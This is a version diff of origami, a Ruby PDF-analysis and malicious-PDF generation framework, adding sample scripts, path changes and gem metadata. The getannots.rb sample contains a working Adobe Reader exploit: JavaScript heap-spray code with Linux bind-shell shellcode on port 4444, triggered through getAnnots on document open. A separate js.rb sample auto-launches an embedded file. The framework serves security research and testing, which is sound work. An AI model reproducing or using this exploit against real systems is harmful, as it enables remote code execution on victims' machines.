origami 1.2.1 → 1.2.2

data/samples/exploits/getannots.rb

@@ -0,0 +1,69 @@
+#!/usr/bin/env ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+pdf = PDF.read(ARGV[0])
+
+jscript = %Q|
+//##############
+//Exploit made by Arr1val
+//Proved in adobe 9.1 and adobe 8.1.4 on linux
+//
+//Steps:
+//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)
+//- attach the following script to the OpenAction of the pdf.
+//##############
+
+app.alert('start heap spray...');
+
+
+var memory;
+var nop = unescape("%u9090%u9090"); //long nop will also force the address to go to 0x90909090 so 2 steps in one
+var shellcode = unescape( "%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4"); //linux bind shell at port 4444
+
+while(nop.length <= 0x100000/2) {
+  nop += nop;
+}
+
+nop = nop.substring(0,0x100000/2 - shellcode.length);
+
+memory = new Array();
+for(i=0; i<0x3; i++) { //we should at least overwrite 0x90909090
+    memory[i] = nop + shellcode;
+}
+
+
+//start exploit now
+start();
+
+function start()
+{
+//    this.getAnnots(-134217728,-134217728,-134217728,-134217728);
+    app.alert("boom?");
+    this.getAnnots(-134217728,-134217729,-134217730,-134217731); //get control on EDI
+}
+
+
+//# milw0rm.com [2009-04-29]
+|
+
+#exploit = Action::JavaScript.new(Stream.new(jscript).setFilter([:FlateDecode, :ASCII85Decode, :RunLengthDecode]))
+exploit = Action::JavaScript.new(Stream.new(jscript))
+pdf.onDocumentOpen( exploit )
+
+
+annot = Annotation::Text.new
+annot.Contents =  "Hello world"
+annot.Rect = [ 512, 512, 660, 606]
+annot.F = Annotation::Flags::HIDDEN
+pdf.pages[0].add_annot( annot )
+
+pdf.save("#{File.basename($0, '.rb')}.pdf")
+

data/samples/flash/flash.rb

@@ -0,0 +1,31 @@
+#!/usr/bin/env ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+INPUTFILE = "helloworld.swf"
+OUTPUTFILE = "#{File.basename(__FILE__, ".rb")}.pdf"
+
+puts "Now generating a new PDF file from scratch!"
+
+# Creating a new file
+pdf = PDF.new.append_page(page = Page.new)
+
+# Embedding the SWF file into the PDF.
+swf = pdf.attach_file(INPUTFILE)
+
+# Creating a Flash annotation on the page.
+annot = page.add_flash_application(swf, :windowed => true, :navigation_pane => true, :toolbar => true)
+
+# Setting the player position on the page.
+annot.Rect = Rectangle.new(204, 573, 403, 718)
+
+pdf.save(OUTPUTFILE)
+
+puts "PDF file saved as #{OUTPUTFILE}."

data/samples/javascript/attached.txt

@@ -0,0 +1 @@
+***THIS IS THE EMBEDDED FILE***

data/samples/javascript/js.rb

@@ -0,0 +1,52 @@
+#!/usr/bin/env ruby 
+
+begin
+  require 'origami'
+rescue LoadError
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../../lib"
+  $: << ORIGAMIDIR
+  require 'origami'
+end
+include Origami
+
+if defined?(PDF::JavaScript::Engine)
+
+  INPUTFILE = "attached.txt"
+
+  # Creating a new file
+  pdf = PDF.new
+
+  # Embedding the file into the PDF.
+  pdf.attach_file(INPUTFILE, 
+    :EmbeddedName => "README.txt", 
+    :Filter => :ASCIIHexDecode
+  )
+
+  # Example of JS payload
+  js = <<-JS
+    if ( app.viewerVersion == 8 )
+      eval("this.exportDataObject({cName:'README.txt', nLaunch:2});");
+    this.closeDoc();
+  JS
+  pdf.onDocumentOpen Action::JavaScript.new(js)
+
+  # Tweaking the engine options
+  pdf.js_engine.options[:log_method_calls] = true
+  pdf.js_engine.options[:viewerVersion] = 8
+
+  # Hooking eval()
+  pdf.js_engine.hook 'eval' do |eval, expr|
+    puts "Hook: eval(#{expr.inspect})"
+    eval.call(expr) # calling the real eval method
+  end
+
+  # Example of inline JS evaluation
+  pdf.eval_js 'console.println(util.stringFromStream(this.getDataObjectContents("README.txt")))'
+
+  # Executes the string as a JS script
+  pdf.Catalog.OpenAction[:JS].eval_js
+
+else
+  puts "JavaScript support not found. You need to install therubyracer gem."
+end
+

data/{tests → test}/ts_pdf.rb

@@ -12,7 +12,7 @@ require 'tc_pdfnew.rb'
 begin
   require 'origami'
 rescue LoadError
-  ORIGAMIDIR = "#{File.dirname(__FILE__)}/.."
+  ORIGAMIDIR = "#{File.dirname(__FILE__)}/../lib"
   $: << ORIGAMIDIR
   require 'origami'
 end

metadata

@@ -1,13 +1,13 @@
 --- !ruby/object:Gem::Specification 
 name: origami
 version: !ruby/object:Gem::Version 
-  hash: 29
+  hash: 27
   prerelease: false
   segments: 
   - 1
   - 2
-  - 1
-  version: 1.2.1
+  - 2
+  version: 1.2.2
 platform: ruby
 authors: 
 - "Guillaume Delugr\xC3\xA9"
@@ -15,7 +15,7 @@ autorequire:
 bindir: bin
 cert_chain: []
 
-date: 2011-10-05 00:00:00 +02:00
+date: 2011-10-18 00:00:00 +02:00
 default_executable: 
 dependencies: []
 
@@ -36,6 +36,7 @@ executables:
 - pdfcocoon
 - pdfsh
 - pdfwalker
+- pdf2pdfa
 extensions: []
 
 extra_rdoc_files: []
@@ -43,114 +44,127 @@ extra_rdoc_files: []
 files: 
 - README
 - COPYING.LESSER
-- origami.rb
-- origami/graphics/colors.rb
-- origami/graphics/instruction.rb
-- origami/graphics/path.rb
-- origami/graphics/patterns.rb
-- origami/graphics/render.rb
-- origami/graphics/state.rb
-- origami/graphics/text.rb
-- origami/graphics/xobject.rb
-- origami/3d.rb
-- origami/acroform.rb
-- origami/actions.rb
-- origami/adobe/fdf.rb
-- origami/adobe/ppklite.rb
-- origami/annotations.rb
-- origami/array.rb
-- origami/boolean.rb
-- origami/catalog.rb
-- origami/destinations.rb
-- origami/dictionary.rb
-- origami/docmdp.rb
-- origami/export.rb
-- origami/file.rb
-- origami/filters/ascii.rb
-- origami/filters/ccitt.rb
-- origami/filters/crypt.rb
-- origami/filters/dct.rb
-- origami/filters/flate.rb
-- origami/filters/jbig2.rb
-- origami/filters/jpx.rb
-- origami/filters/lzw.rb
-- origami/filters/predictors.rb
-- origami/filters/runlength.rb
-- origami/filters.rb
-- origami/font.rb
-- origami/functions.rb
-- origami/graphics.rb
-- origami/header.rb
-- origami/javascript.rb
-- origami/linearization.rb
-- origami/metadata.rb
-- origami/name.rb
-- origami/null.rb
-- origami/numeric.rb
-- origami/obfuscation.rb
-- origami/object.rb
-- origami/outline.rb
-- origami/page.rb
-- origami/parser.rb
-- origami/parsers/fdf.rb
-- origami/parsers/pdf/linear.rb
-- origami/parsers/pdf.rb
-- origami/parsers/ppklite.rb
-- origami/reference.rb
-- origami/signature.rb
-- origami/stream.rb
-- origami/string.rb
-- origami/trailer.rb
-- origami/xfa.rb
-- origami/xreftable.rb
-- origami/webcapture.rb
-- origami/pdf.rb
-- origami/encryption.rb
-- origami/outputintents.rb
+- lib/origami/3d.rb
+- lib/origami/actions.rb
+- lib/origami/annotations.rb
+- lib/origami/array.rb
+- lib/origami/boolean.rb
+- lib/origami/catalog.rb
+- lib/origami/destinations.rb
+- lib/origami/dictionary.rb
+- lib/origami/export.rb
+- lib/origami/file.rb
+- lib/origami/filters.rb
+- lib/origami/filters/ascii.rb
+- lib/origami/filters/crypt.rb
+- lib/origami/filters/dct.rb
+- lib/origami/filters/flate.rb
+- lib/origami/filters/jbig2.rb
+- lib/origami/filters/jpx.rb
+- lib/origami/filters/lzw.rb
+- lib/origami/filters/predictors.rb
+- lib/origami/filters/runlength.rb
+- lib/origami/filters/ccitt.rb
+- lib/origami/font.rb
+- lib/origami/functions.rb
+- lib/origami/graphics.rb
+- lib/origami/graphics/instruction.rb
+- lib/origami/graphics/path.rb
+- lib/origami/graphics/patterns.rb
+- lib/origami/graphics/render.rb
+- lib/origami/graphics/text.rb
+- lib/origami/graphics/state.rb
+- lib/origami/graphics/colors.rb
+- lib/origami/graphics/xobject.rb
+- lib/origami/header.rb
+- lib/origami/javascript.rb
+- lib/origami/linearization.rb
+- lib/origami/metadata.rb
+- lib/origami/name.rb
+- lib/origami/null.rb
+- lib/origami/numeric.rb
+- lib/origami/obfuscation.rb
+- lib/origami/outline.rb
+- lib/origami/outputintents.rb
+- lib/origami/page.rb
+- lib/origami/parsers/pdf/linear.rb
+- lib/origami/parsers/pdf.rb
+- lib/origami/parsers/fdf.rb
+- lib/origami/parsers/ppklite.rb
+- lib/origami/reference.rb
+- lib/origami/string.rb
+- lib/origami/trailer.rb
+- lib/origami/webcapture.rb
+- lib/origami/xfa.rb
+- lib/origami/docmdp.rb
+- lib/origami/stream.rb
+- lib/origami/object.rb
+- lib/origami/extensions/fdf.rb
+- lib/origami/extensions/ppklite.rb
+- lib/origami/xreftable.rb
+- lib/origami/parser.rb
+- lib/origami/encryption.rb
+- lib/origami/signature.rb
+- lib/origami/pdf.rb
+- lib/origami/acroform.rb
+- lib/origami.rb
 - bin/config/pdfcop.conf.yml
 - bin/gui/about.rb
 - bin/gui/config.rb
 - bin/gui/file.rb
 - bin/gui/hexdump.rb
-- bin/gui/hexview.rb
 - bin/gui/imgview.rb
-- bin/gui/menu.rb
 - bin/gui/properties.rb
 - bin/gui/signing.rb
-- bin/gui/textview.rb
-- bin/gui/treeview.rb
-- bin/gui/walker.rb
 - bin/gui/xrefs.rb
+- bin/gui/walker.rb
+- bin/gui/hexview.rb
+- bin/gui/treeview.rb
+- bin/gui/textview.rb
+- bin/gui/menu.rb
+- bin/pdfsh
+- bin/pdfwalker
+- bin/shell/console.rb
+- bin/shell/hexdump.rb
 - bin/pdf2graph
+- bin/pdf2pdfa
 - bin/pdf2ruby
 - bin/pdfcocoon
+- bin/pdfcop
 - bin/pdfdecompress
 - bin/pdfdecrypt
-- bin/pdfextract
-- bin/pdfmetadata
-- bin/pdfsh
-- bin/pdfwalker
-- bin/shell/console.rb
-- bin/shell/hexdump.rb
 - bin/pdfencrypt
-- bin/pdfcop
-- bin/pdf2pdfa
-- tests/dataset/test.dummycrt
-- tests/dataset/test.dummykey
-- tests/tc_actions.rb
-- tests/tc_annotations.rb
-- tests/tc_pages.rb
-- tests/tc_pdfattach.rb
-- tests/tc_pdfencrypt.rb
-- tests/tc_pdfnew.rb
-- tests/tc_pdfparse.rb
-- tests/tc_pdfsig.rb
-- tests/tc_streams.rb
-- tests/ts_pdf.rb
+- bin/pdfmetadata
+- bin/pdfextract
+- samples/actions/launch/calc.rb
+- samples/actions/launch/winparams.rb
+- samples/actions/loop/loopgoto.rb
+- samples/actions/loop/loopnamed.rb
+- samples/actions/named/named.rb
+- samples/actions/samba/smbrelay.rb
+- samples/actions/triggerevents/trigger.rb
+- samples/actions/webbug/submitform.js
+- samples/actions/webbug/webbug-browser.rb
+- samples/actions/webbug/webbug-js.rb
+- samples/actions/webbug/webbug-reader.rb
+- samples/attachments/attached.txt
+- samples/attachments/attach.rb
+- samples/crypto/crypto.rb
+- samples/digsig/signed.rb
+- samples/exploits/cve-2008-2992-utilprintf.rb
+- samples/exploits/cve-2009-0927-geticon.rb
+- samples/exploits/exploit_customdictopen.rb
+- samples/exploits/getannots.rb
+- samples/flash/helloworld.swf
+- samples/flash/flash.rb
+- samples/README.txt
+- samples/javascript/attached.txt
+- samples/javascript/js.rb
 - templates/patterns.rb
 - templates/widgets.rb
 - templates/xdp.rb
 - bin/shell/.irbrc
+- test/ts_pdf.rb
 has_rdoc: true
 homepage: http://aslr.fr/pages/Origami
 licenses: []
@@ -159,7 +173,7 @@ post_install_message:
 rdoc_options: []
 
 require_paths: 
-- .
+- lib
 required_ruby_version: !ruby/object:Gem::Requirement 
   none: false
   requirements: 
@@ -186,4 +200,4 @@ signing_key:
 specification_version: 3
 summary: Origami aims at providing a scripting tool to generate and analyze malicious PDF files.
 test_files: 
-- tests/ts_pdf.rb
+- test/ts_pdf.rb

data/origami/adobe/fdf.rb

@@ -1,259 +0,0 @@
-=begin
-
-= File
-	adobe/fdf.rb
-
-= Info
-	This file is part of Origami, PDF manipulation framework for Ruby
-	Copyright (C) 2010	Guillaume Delugr� <guillaume@security-labs.org>
-	All right reserved.
-	  
-  Origami is free software: you can redistribute it and/or modify
-  it under the terms of the GNU Lesser General Public License as published by
-  the Free Software Foundation, either version 3 of the License, or
-  (at your option) any later version.
-
-  Origami is distributed in the hope that it will be useful,
-  but WITHOUT ANY WARRANTY; without even the implied warranty of
-  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-  GNU Lesser General Public License for more details.
-
-  You should have received a copy of the GNU Lesser General Public License
-  along with Origami.  If not, see <http://www.gnu.org/licenses/>.
-
-=end
-
-require 'origami/object'
-require 'origami/name'
-require 'origami/dictionary'
-require 'origami/reference'
-require 'origami/boolean'
-require 'origami/numeric'
-require 'origami/string'
-require 'origami/array'
-require 'origami/trailer'
-require 'origami/xreftable'
-
-module Origami
-
-  module Adobe
-    
-    #
-    # Class representing an AcroForm Forms Data Format file.
-    #
-    class FDF
-      
-      class Header
-
-        MAGIC = /\A%FDF-(\d)\.(\d)/
-        
-        attr_accessor :majorversion, :minorversion
-        
-        #
-        # Creates a file header, with the given major and minor versions.
-        # _majorversion_:: Major version.
-        # _minorversion_:: Minor version.
-        #
-        def initialize(majorversion = 2, minorversion = 1)
-          @majorversion, @minorversion = majorversion, minorversion
-        end
-        
-        def self.parse(stream) #:nodoc:
-          
-          if not stream.scan(MAGIC).nil?
-            maj = stream[1].to_i
-            min = stream[2].to_i
-          else
-            raise InvalidHeader, "Invalid header format"
-          end
-          
-          PPKLite::Header.new(maj,min)
-        end
-        
-        def to_s
-          "%FDF-#{@majorversion}.#{@minorversion}" + EOL
-        end
-        
-        def to_sym #:nodoc:
-          "#{@majorversion}.#{@minorversion}".to_sym
-        end
-        
-        def to_f #:nodoc:
-          to_sym.to_s.to_f
-        end
-      
-      end
-
-      class Revision #:nodoc;
-        attr_accessor :pdf
-        attr_accessor :body, :xreftable, :trailer
-        
-        def initialize(adbk)
-          @pdf = adbk
-          @body = {}
-          @xreftable = nil
-          @trailer = nil
-        end
-
-        def trailer=(trl)
-          trl.pdf = @pdf
-          @trailer = trl
-        end
-      end
-
-      attr_accessor :header, :revisions
-      
-      def initialize #:nodoc:
-        @header = FDF::Header.new
-        @revisions = [ Revision.new(self) ]
-        @revisions.first.trailer = Trailer.new
-      end
-      
-      def objects
-        def append_subobj(root, objset)
-          if objset.find{ |o| o.object_id == root.object_id }.nil?
-            objset << root
-            if root.is_a?(Array) or root.is_a?(Dictionary)
-              root.each { |subobj| append_subobj(subobj, objset) unless subobj.is_a?(Reference) }
-            end
-          end
-        end
-        
-        objset = []
-        @revisions.first.body.values.each do |object|
-          unless object.is_a?(Reference)
-            append_subobj(object, objset)
-          end
-        end
-        
-        objset
-      end
-      
-      def <<(object)
-        
-        object.set_indirect(true)
-        
-        if object.no.zero?
-        maxno = 1
-          while get_object(maxno) do maxno = maxno.succ end
-          
-          object.generation = 0
-          object.no = maxno
-        end
-        
-        @revisions.first.body[object.reference] = object
-        
-        object.reference
-      end
-      
-      def Catalog
-        get_object(@trailer.Root)
-      end
-      
-      def save(filename)
-        
-        bin = ""
-        bin << @header.to_s
-
-        lastno, brange = 0, 0
-          
-        xrefs = [ XRef.new(0, XRef::LASTFREE, XRef::FREE) ]
-        xrefsection = XRef::Section.new
- 
-        @revisions.first.body.values.sort.each { |obj|
-          if (obj.no - lastno).abs > 1
-            xrefsection << XRef::Subsection.new(brange, xrefs)
-            brange = obj.no
-            xrefs.clear
-          end
-          
-          xrefs << XRef.new(bin.size, obj.generation, XRef::USED)
-          lastno = obj.no
-
-          bin << obj.to_s
-        }
-        
-        xrefsection << XRef::Subsection.new(brange, xrefs)
-        
-        @xreftable = xrefsection
-        @trailer ||= Trailer.new
-        @trailer.Size = rev.body.size + 1
-        @trailer.startxref = bin.size
-
-        bin << @xreftable.to_s
-        bin << @trailer.to_s
-
-        fd = File.open(filename, "w").binmode
-          fd << bin 
-        fd.close
-        
-        show_entries
-      end
-      alias saveas save
-      
-      private
-      
-      def rebuildxrefs #:nodoc:
-        
-        startxref = @header.to_s.size
-        
-        @revisions.first.body.values.each { |object|
-          startxref += object.to_s.size
-        }
-          
-        @xreftable = buildxrefs(@revisions.first.body)
-        
-        @trailer ||= Trailer.new
-        @trailer.Size = @revisions.first.body.size + 1
-        @trailer.startxref = startxref
-        
-        self
-      end
-      
-      def buildxrefs(objects) #:nodoc:
-        
-        lastno = 0
-        brange = 0
-        
-        xrefs = [ XRef.new(0, XRef::LASTFREE, XRef::FREE) ]
-        
-        xrefsection = XRef::Section.new
-        objects.sort.each { |object|
-          if (object.no - lastno).abs > 1
-            xrefsection << XRef::Subsection.new(brange, xrefs)
-            brange = object.no
-            xrefs.clear
-          end
-          
-          xrefs << XRef.new(get_object_offset(object.no, object.generation), object.generation, XRef::USED)
-
-          lastno = object.no
-        }
-        
-        xrefsection << XRef::Subsection.new(brange, xrefs)
-        
-        xrefsection
-      end
-     
-      def get_object_offset(no,generation) #:nodoc:
-
-        bodyoffset = @header.to_s.size
-        
-        objectoffset = bodyoffset
-          
-        @revisions.first.body.values.each { |object|
-          if object.no == no and object.generation == generation then return objectoffset
-          else
-            objectoffset += object.to_s.size
-          end
-        }
-        
-        nil
-      end
-      
-    end
-    
-  end
-  
-end
-